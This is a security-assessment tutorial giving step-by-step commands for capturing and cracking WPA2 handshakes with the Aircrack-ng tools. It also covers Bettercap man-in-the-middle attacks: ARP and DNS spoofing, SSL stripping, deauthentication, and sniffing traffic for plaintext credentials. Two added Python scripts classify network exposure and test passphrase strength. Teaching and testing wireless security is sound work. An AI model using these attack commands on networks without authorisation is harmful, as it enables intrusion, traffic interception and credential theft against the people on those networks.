WPA2 Wi-Fi Password Cracking
WPA2 Wi-Fi password cracking is the process of exploiting weaknesses in wireless networks to gain unauthorized access by targeting weak security configurations or poorly chosen passphrases. This guide covers the techniques and tools used in Wi-Fi security assessments, focusing on capturing WPA2 handshakes, which contain the material needed to test passphrase guesses offline. Aircrack-ng is used to capture these handshakes, and Aircrack-ng or Hashcat to crack them, allowing penetration testers to test the strength of a WPA2 passphrase.
We will also explore common attack vectors, such as dictionary attacks, brute-force methods, and the use of deauthentication attacks to force reconnections and capture handshakes more efficiently. Understanding these techniques is essential for evaluating and strengthening the security of wireless networks, ensuring that they are properly protected against unauthorized access and attacks.
However, with the introduction of WPA3, many of these attacks become far less effective because of a stronger key exchange, Simultaneous Authentication of Equals (SAE), which replaces the traditional pre-shared key (PSK) handshake. Because SAE never exposes material that can be tested offline, a captured exchange cannot be fed to a dictionary attack, making it significantly harder to recover passphrases with traditional methods. As a result, penetration testers must adopt different techniques when assessing networks secured by WPA3, as the common methods used for WPA2 cracking may not work on these newer networks.
Video Credit: David Bombal - Educational video on WPA2 and Wi-Fi Security.
Identifying Your Wireless Adapter
First, we need to identify our wireless adapter to ensure it is compatible with monitor mode, which is essential for packet capture. Use the command below to see available network interfaces:
iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  Mode:Managed  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
The output above shows that wlan0 is in Managed mode, which means it is operating as an ordinary client (station) that associates with an access point. To conduct Wi-Fi cracking, we need to switch it to monitor mode so that it passes every frame it hears to the capture tool.
Enabling Monitor Mode
Before enabling monitor mode, it is important to kill any processes that could interfere with the operation of the wireless interface:
sudo airmon-ng check kill
Now, enable monitor mode on wlan0 using:
sudo airmon-ng start wlan0
Verify that the mode has changed to Monitor by running the following command again:
iwconfig

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
Depending on the driver, the interface name may have changed to wlan0mon; Mode:Monitor confirms that it is now in monitor mode and ready for packet capture.
Scanning for Available Networks
Next, we will scan for available wireless networks. Use airodump-ng to gather information about nearby networks:

sudo airodump-ng wlan0mon

 CH 13 ][ Elapsed: 0 s ][ 2024-10-12 20:44

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID
 00:00:00:00:00:00  -41        1     11    0   7  1300  WPA2  CCMP    PSK   ExampleWiFi
Identify the target network by noting its BSSID (MAC Address) and the Channel (CH) it is using. This information is crucial for the next steps.
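When airodump-ng is run with -w (as in the next section) it also writes the same table to capturefile-01.csv. The following added script, which is not part of this guide or of the Aircrack-ng project, parses that CSV into an inventory and labels each network by how exposed it is to the attacks described here, including the WPA3 transition-mode case where a WPA2-PSK handshake is still obtainable. The CSV rows are constructed samples in the real file layout.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# when run with -w: an access-point section, a blank line, then a station
# section. Only the AP section is inventoried. All values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:00:00:00:00:00, 2024-10-12 20:44:01, 2024-10-12 20:44:09, 7, 1300, WPA2, CCMP, PSK, -41, 1, 11, 0. 0. 0. 0, 11, ExampleWiFi,
00:00:00:00:00:01, 2024-10-12 20:44:01, 2024-10-12 20:44:09, 36, 1300, WPA3, CCMP, SAE, -55, 3, 0, 0. 0. 0. 0, 9, LabSecure,
00:00:00:00:00:02, 2024-10-12 20:44:01, 2024-10-12 20:44:09, 44, 1300, WPA3 WPA2, CCMP, SAE PSK, -60, 3, 0, 0. 0. 0. 0, 10, Transition,
00:00:00:00:00:03, 2024-10-12 20:44:02, 2024-10-12 20:44:08, 1, 54, OPN, , , -70, 2, 0, 0. 0. 0. 0, 5, Guest,
00:00:00:00:00:04, 2024-10-12 20:44:02, 2024-10-12 20:44:08, 11, 54, WEP, WEP, , -80, 2, 40, 0. 0. 0. 0, 6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

def classify(privacy, auth):
    """Map the Privacy and Authentication columns to a risk label."""
    if "OPN" in privacy:
        return "open: no encryption at all"
    if "WEP" in privacy:
        return "WEP: broken cipher, replace"
    if "WPA3" in privacy:
        if "PSK" in auth:
            return "WPA3 transition mode: WPA2-PSK handshake still obtainable"
        return "WPA3-SAE: offline dictionary attack not possible"
    if "PSK" in auth:
        return "WPA/WPA2-PSK: handshake crackable offline if passphrase is weak"
    if "MGT" in auth:
        return "WPA-Enterprise (802.1X): no shared passphrase to crack"
    return "unknown"

def inventory(csv_text):
    """Return one dict per access point in the AP section of the CSV."""
    reader = csv.reader(io.StringIO(csv_text), skipinitialspace=True)
    header, aps = None, []
    for fields in reader:
        if not fields:            # blank line marks the end of the AP section
            break
        if header is None:
            header = fields
            continue
        rec = dict(zip(header, fields))
        aps.append({
            "bssid": rec["BSSID"],
            "channel": int(rec["channel"]),
            "essid": rec["ESSID"],
            "risk": classify(rec["Privacy"], rec["Authentication"]),
        })
    return aps
```

Networks labelled WPA/WPA2-PSK or transition mode are the ones where the handshake capture below matters; the rest either need no cracking (open, WEP) or cannot be cracked offline at all.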
Capturing Handshake Data
We will now capture packets to obtain the WPA2 handshake, which occurs when a device connects to the target network. Use the following command, replacing the placeholders with your captured details:
sudo airodump-ng -w capturefile -c 7 --bssid 00:00:00:00:00:00 wlan0mon
The above command writes captured packets to files with the prefix capturefile (the packet capture itself lands in capturefile-01.cap), listening only on channel 7 for the chosen BSSID. Once a client connects, the WPA handshake should be captured.
Forcing a Client to Reconnect
In some cases, you may need to force a device to disconnect so that it will reconnect, thereby allowing you to capture the handshake. This can be done by sending deauthentication packets:
sudo aireplay-ng --deauth 0 -a 00:00:00:00:00:00 wlan0mon
Wait for the handshake to be captured; airodump-ng reports it in its header line as [ WPA handshake: 00:00:00:00:00:00 ].
Cracking the Password
After capturing the handshake, the next step is to attempt to crack the WPA2 passphrase using a dictionary attack. Use aircrack-ng along with a wordlist like rockyou.txt:
aircrack-ng capturefile-01.cap -w /usr/share/wordlists/rockyou.txt
If the wordlist is compressed, unzip it first:
gunzip /usr/share/wordlists/rockyou.txt.gz
Aircrack-ng will then try every entry in the wordlist, deriving the key for each candidate and checking it against the captured handshake until a candidate matches or the list is exhausted. A passphrase that does not appear in the list (or in the simple variations tools derive from it) is not recoverable this way.
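The flip side of the dictionary attack above is that a passphrase falls to it only if the passphrase, or a cheap variation of it, is in the wordlist. The following added check, not part of this guide, tests a candidate passphrase the way a defender should before deploying it: against a wordlist after the common mangling rules (case folding, leet substitution, stripping a digit or symbol suffix), plus the WPA2 length rule and whether it embeds the SSID. The wordlist here is a constructed stand-in for rockyou.txt, and the 12-character minimum is an assumed local policy.

```python
import re
import string

# Constructed stand-in for rockyou.txt; in practice stream the real file.
SAMPLE_WORDLIST = {"password", "123456", "iloveyou", "sunshine", "letmein", "examplewifi"}

# Reverse the usual leet substitutions: @->a $->s !->i 0->o 1->l 3->e 4->a 5->s 7->t
LEET = str.maketrans("@$!013457", "asioleast")

def candidates(pw):
    """Yield the cheap variants a wordlist attack with mangling rules also tries."""
    base = pw.lower()
    yield base
    yield base.translate(LEET)
    stripped = re.sub(r"[\d\W_]+$", "", base)      # drop trailing digits/symbols
    yield stripped
    yield stripped.translate(LEET)
    yield re.sub(r"^[\d\W_]+", "", stripped)        # and leading ones

def weaknesses(pw, ssid, wordlist):
    """Return the reasons a candidate passphrase would fall to a dictionary attack."""
    issues = []
    if not 8 <= len(pw) <= 63:
        issues.append("not a valid WPA2 passphrase length (8-63 characters)")
    elif len(pw) < 12:                               # assumed local policy minimum
        issues.append("shorter than 12 characters")
    hits = {c for c in candidates(pw) if c in wordlist}
    if hits:
        issues.append("wordlist match after simple mangling: " + ", ".join(sorted(hits)))
    if ssid.lower() in pw.lower():
        issues.append("contains the network name")
    classes = sum(any(ch in s for ch in pw)
                  for s in (string.ascii_lowercase, string.ascii_uppercase, string.digits))
    if classes < 2 and len(pw) < 20:
        issues.append("single character class and under 20 characters")
    return issues
```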
Video Credit: NetworkChuck - Wi-Fi Hacking
Introduction to Bettercap
Bettercap is a powerful and modular tool designed for network reconnaissance, penetration testing, and Man-in-the-Middle (MITM) attacks. With a wide range of capabilities, it allows attackers to intercept, modify, or even manipulate data being transmitted on a network. Bettercap works on many protocols, including HTTP, HTTPS, TCP, UDP, and more, and is highly effective for wireless network attacks. This guide will help you understand how to perform a MITM attack using Bettercap.
Installing Bettercap
To begin, you need to install Bettercap. This can be done through a package manager like apt on Debian-based systems, or by installing it manually via the Go language.

sudo apt-get update
sudo apt-get install bettercap
Alternatively, you can install Bettercap using Go:
go install github.com/bettercap/bettercap@latest
Setting Up Bettercap for MITM Attacks
Before initiating a MITM attack, make sure you are using the correct network adapter. Use ifconfig or ip a to identify your network interfaces. Monitor mode is needed only for Bettercap's wifi.* modules (such as wifi.deauth below); ARP spoofing, DNS spoofing, the proxies and the sniffer operate on an interface that is connected to the target LAN in the normal managed mode. To enable monitor mode, use airmon-ng as shown earlier, or set it by hand:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Launching Bettercap
To start Bettercap, simply use the following command:
sudo bettercap -iface wlan0
Replace wlan0 with your network interface name.
Performing ARP Spoofing with Bettercap
ARP spoofing is a technique that allows an attacker to position themselves between two communicating devices, intercepting their data in a MITM attack. Bettercap makes ARP spoofing straightforward. First, you need to identify the targets on the network:
net.probe on
This command will discover all active devices on the network. Once you have the IP addresses of your target, you can start ARP spoofing:
set arp.spoof.targets [target-ip]
arp.spoof on

Replace [target-ip] with the actual IP address of the device you want to target. You can also target multiple devices by separating the IPs with commas.
HTTP/HTTPS Traffic Interception
To intercept HTTP traffic, Bettercap has a built-in module called http.proxy. To enable it, use:

http.proxy on

Bettercap can also intercept HTTPS: the https.proxy module terminates the TLS connection with its own certificate so the decrypted data can be viewed (the HTTP downgrade itself is covered under SSL Stripping below). Enable https.proxy:

https.proxy on

Keep in mind that this only works if clients accept the untrusted certificate or ignore the browser warning about it, so it may not be effective on all targets.
DNS Spoofing
Another powerful feature of Bettercap is DNS spoofing, which allows you to redirect DNS requests to a fake IP address, such as a cloned website for phishing:
set dns.spoof.all true
dns.spoof on
With DNS spoofing enabled, all DNS requests on the network will be redirected to a specified IP address.
Sniffing Network Data
Bettercap includes a powerful sniffer module for capturing packets from the network:
net.sniff on
Bettercap will start capturing packets and displaying relevant information on the console. You can use various filters to capture only specific data, such as credentials or sensitive information.
SSL Stripping
SSL stripping is a method used to downgrade HTTPS to HTTP, allowing you to capture sensitive information that would otherwise travel over an encrypted connection. In Bettercap it is a setting of the http.proxy module rather than of https.proxy; to enable it, use:

set http.proxy.sslstrip true
http.proxy on

This rewrites HTTPS links in intercepted pages to HTTP, so that the client's connection stays in plaintext and is easier to capture and analyze. It fails against sites that use HTTP Strict Transport Security (HSTS), especially those on the browser preload list, because the browser refuses to load them over HTTP.
Disconnecting a Client
If you want to disconnect a specific client from the network to force reconnection (for instance, to capture data), you can use deauthentication attacks with Bettercap:
wifi.deauth [target-mac]
Replace [target-mac] with the MAC address of the device you want to disconnect (giving an access point's BSSID instead deauthenticates every client of that access point). The interface must be in monitor mode and the wifi.recon module must already be running (wifi.recon on) so that Bettercap has seen the access point and client. This sends deauthentication frames, disconnecting the target from the network momentarily.
Viewing Captured Traffic with Wireshark
Wireshark is a powerful tool that can be used to analyze the traffic captured during a MITM attack. After starting Bettercap’s sniffer, you can save the captured packets to a file and then analyze them using Wireshark.
First, make sure you have Wireshark installed:
sudo apt-get install wireshark
To save the captured packets, set the net.sniff.output parameter before starting the sniffer:

set net.sniff.output /path/to/save/capture.pcap
net.sniff on

Replace /path/to/save/capture.pcap with the file path where you want the packet capture written.
Once you have saved the packets, open Wireshark and load the capture file:
wireshark /path/to/save/capture.pcap
Wireshark will provide a detailed view of the captured packets, allowing you to analyze various network protocols and identify sensitive information. Here are some tips for analyzing the traffic:
- Filter Traffic: Use Wireshark's filter bar to narrow down the packets of interest. For example, to view only HTTP packets, use the filter http. For ARP packets, use arp.
- Follow TCP Stream: If you want to view the entire conversation between a client and a server, right-click on a packet and select Follow > TCP Stream. This will provide a complete view of the data exchanged in that session.
- Inspect Credentials: Look for HTTP POST requests that may contain login credentials in plaintext. Use filters like http.request.method == "POST" to find such requests.
- Analyze DNS Spoofing: If you performed DNS spoofing, you can filter for DNS packets using dns and observe which requests were redirected.
MITM Attacks Becoming Outdated
MITM attacks have become increasingly outdated due to the widespread adoption of HTTPS, which encrypts data between clients and servers. Unlike HTTP, which transmits information in plaintext, HTTPS ensures that sensitive data such as login credentials and personal information are securely transmitted, making it challenging for attackers to capture meaningful information without decrypting the traffic. Without access to the decryption key, intercepted data remains unreadable, significantly reducing the effectiveness of MITM attacks in modern networks. As a result, MITM attacks are mostly limited to situations where attackers can bypass or compromise encryption.